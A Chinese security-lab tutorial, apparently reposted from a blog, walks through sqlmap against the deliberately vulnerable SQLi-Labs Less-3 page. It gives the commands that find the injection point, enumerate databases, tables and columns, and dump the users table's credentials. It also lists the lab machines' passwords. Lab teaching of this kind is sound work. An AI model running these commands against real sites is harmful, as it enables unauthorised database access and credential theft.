文章总结： 本文介绍SQLMAP自动化SQL注入工具的基础使用实验，通过SQLi-Labs环境演示了从漏洞扫描到数据获取的全流程。实验涵盖SQLMAP支持的五种注入技术原理，重点讲解了利用-u参数检测注入点，并依次使用–dbs、–tables、–columns及–dump命令成功提取出security数据库中的用户凭证。该教程为初学者提供了清晰的自动化注入实战步骤。 综合评分： 82 文章分类： 渗透测试,安全工具,WEB安全

网安实验干货每日分享SQL注入-SQLMAP基础使用1-0106

原创

建哥聊安全

建哥聊安全

2026年1月6日 11:16 湖南

SQL注入-SQLMAP基础使用1

实验目的

了解SQLMAP的工作原理，熟悉SQLMAP的常用命令，掌握SQLMAP的-u参数的基本使用方法。

实验环境

攻击机：Pentest-Atk

（1）操作系统：Windows 10

（2）安装的应用软件：Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、FoxyProxy等

（3）登录账号密码：操作系统帐号Administrator，密码Sangfor!7890

靶机：A-SQLi-Labs

（1）操作系统：CentOS 7

（2）安装的应用软件：Apache、MySQL(MariaDB)、PHP；DVWA、SQLi-Labs、Webug3.0漏洞网站环境

（3）登录账号密码：操作系统账号root，密码Sangfor!7890

实验原理

SQLMAP是一个开源的自动化SQL注入工具，其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。 SQLMAP的基本功能包括：判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。 SQLMAP支持的注入技术包括以下五种： （1）基于布尔的盲注：根据返回页面判断条件真假的注入。 （2）基于时间的盲注：不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 （3）基于报错的注入：页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 （4）基于联合查询的注入：可以使用UNION的情况下的注入。 （5）堆查询注入：同时执行多条语句的注入。 SQLMAP支持的数据库类型主要包括一些关系型数据库（RMDBS），如MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、Informix、HSQLDB等。

实验步骤

本实验的目标是：以SQLi-Labs网站的Less-3为入口，利用SQLMAP实施自动化SQL注入，获取SQLi-Labs网站的登录用户名和密码。

1．访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-3。访问的URL为：

http://[靶机IP]/sqli-labs/Less-3/

(注意大小写)

登录后，根据网页提示，先给定一个GET参数，即：

http://[靶机IP]/sqli-labs/Less-3/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

2．启动SQLMAP

启动Windows操作系统的命令行工具cmd：

在命令行工具cmd中输入以下命令，进入SQLMAP程序所在的路径：

cd C:\Users\Administrator\Desktop\tools\装机工具\sqlmap-master

进入SQLMAP程序所在的路径后，使用以下命令启动SQLMAP帮助：

python sqlmap.py -h

3．寻找注入点

使用以下命令自动寻找网站的注入点，并获取网站及后台数据库的基本信息：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1”

检测结果如下图所示：

4．获取所有数据库的库名

（1）使用以下命令获取所有数据库的库名：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1” –dbs

检测结果如下图所示：

（2）使用以下命令获取网站当前所在数据库的库名：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1” –current-db

检测结果：网站当前所在数据库的库名为security。

5．获取security数据库中所有的表名

使用以下命令获取security数据库中所有的表名：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1” -D security –tables

检测结果：security数据库中含有emails、referers、uagents、users四张表。

其中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

6．获取users表的全部字段名

使用以下命令获取users表的全部字段名：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1” -D security -T users –columns

检测结果：users表中有三个字段id、username和password。

7．获取users表id、username和password字段的全部值

使用以下命令获取users表id、username和password字段的全部值：

python sqlmap.py -u “http://[靶机IP]/sqli-labs/Less-3/?id=1” -D security -T users -C id,username,password –dump

检测结果如下图所示：

实验至此结束。

实验总结

本次实验，成功利用SQLMAP对存在GET型注入点的网站进行了自动化SQL注入，掌握了SQLMAP的-u参数的基本使用方法。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全《网安实验干货每日分享SQL注入-SQLMAP基础使用1-0106》